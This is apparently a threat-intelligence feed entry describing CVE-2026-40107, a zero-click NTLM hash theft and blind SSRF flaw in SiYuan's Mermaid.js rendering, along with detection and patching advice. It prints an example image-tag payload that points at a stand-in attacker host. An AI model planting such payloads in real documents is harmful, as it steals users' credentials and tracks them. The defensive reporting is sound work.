{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/mermaid/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-40107"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["siyuan","ntlm","ssrf","credential-theft","mermaid"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan, a note-taking application, is vulnerable to a zero-click NTLM hash theft and blind SSRF exploit due to insecure configuration of Mermaid.js. The application configures Mermaid.js with \u003ccode\u003esecurityLevel: \u0026quot;loose\u0026quot;\u003c/code\u003e and \u003ccode\u003ehtmlLabels: true\u003c/code\u003e, which allows \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tags with \u003ccode\u003esrc\u003c/code\u003e attributes to bypass sanitization and be injected into SVG \u003ccode\u003e\u0026lt;foreignObject\u0026gt;\u003c/code\u003e blocks. When a user opens a note containing a malicious Mermaid diagram with a protocol-relative URL (e.g., \u003ccode\u003e//attacker.com/image.png\u003c/code\u003e), the Electron client fetches the URL. On Windows, this resolves as a UNC path, triggering SMB authentication and sending the victim\u0026rsquo;s NTLMv2 hash to the attacker. On macOS and Linux, the same diagram triggers an HTTP request to the attacker\u0026rsquo;s server, exfiltrating the victim\u0026rsquo;s IP address. The vulnerability affects SiYuan versions prior to the fix implemented after April 7, 2026. This allows for credential theft without any user interaction beyond opening a note.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious SiYuan note containing a Mermaid diagram with a protocol-relative URL within an \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag, such as \u003ccode\u003e\u0026lt;img src='//attacker.com/share/img.png'\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious note (e.g., via sharing or a crafted .sy export).\u003c/li\u003e\n\u003cli\u003eThe victim opens the note in SiYuan.\u003c/li\u003e\n\u003cli\u003eSiYuan renders the Mermaid diagram using the insecure Mermaid.js configuration.\u003c/li\u003e\n\u003cli\u003eThe SVG containing the malicious \u003ccode\u003e\u0026lt;img\u0026gt;\u003c/code\u003e tag is injected into the DOM via \u003ccode\u003einnerHTML\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe Electron client attempts to fetch the resource at the protocol-relative URL.\u003c/li\u003e\n\u003cli\u003eOn Windows, the protocol-relative URL resolves to a UNC path (\u003ccode\u003e\\\\attacker.com\\share\\img.png\u003c/code\u003e), initiating an SMB connection.\u003c/li\u003e\n\u003cli\u003eWindows automatically sends the victim\u0026rsquo;s NTLMv2 hash to the attacker\u0026rsquo;s SMB server, or makes an HTTP request leaking victim\u0026rsquo;s IP on other platforms.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe vulnerability allows for zero-click NTLMv2 hash theft on Windows systems, where the victim only needs to open a note containing the malicious Mermaid diagram. The stolen NTLMv2 hashes can be cracked offline or used in relay attacks to gain unauthorized access to the victim\u0026rsquo;s resources. On all platforms, this vulnerability can be exploited to perform blind SSRF and leak the victim\u0026rsquo;s IP address, acting as a tracking pixel to confirm when the note was opened. This affects all SiYuan users who receive a crafted note.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid NTLM Theft Attempt\u003c/code\u003e to identify SMB traffic originating from SiYuan processes attempting to connect to external IPs (network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect SiYuan Mermaid SSRF Attempt\u003c/code\u003e to detect HTTP requests from SiYuan to external IP addresses with a suspicious URL (network_connection log source).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for SMB connections originating from SiYuan, especially to unusual or external destinations (network_connection log source).\u003c/li\u003e\n\u003cli\u003eBlock the attacker\u0026rsquo;s domain (\u003ccode\u003eattacker.com\u003c/code\u003e) at the DNS resolver, as observed in the malicious Mermaid diagram example (iocs).\u003c/li\u003e\n\u003cli\u003eUpgrade SiYuan to a patched version that addresses CVE-2026-40107 to mitigate the underlying vulnerability.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-11T12:00:00Z","date_published":"2026-04-11T12:00:00Z","id":"/briefs/2026-04-siyuan-ntlm-ssrf/","summary":"SiYuan is vulnerable to zero-click NTLM hash theft on Windows and blind SSRF on all platforms due to insecure Mermaid.js configuration, where a malicious Mermaid diagram containing a protocol-relative URL can be injected into a note, causing the Electron client to fetch the URL, triggering SMB authentication on Windows and sending the victim's NTLMv2 hash to the attacker. On macOS and Linux, the request acts as a tracking pixel and blind SSRF.","title":"SiYuan Zero-Click NTLM Theft and Blind SSRF via Mermaid Diagrams","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-ntlm-ssrf/"}],"language":"en","title":"CraftedSignal Threat Feed — Mermaid","version":"https://jsonfeed.org/version/1.1"}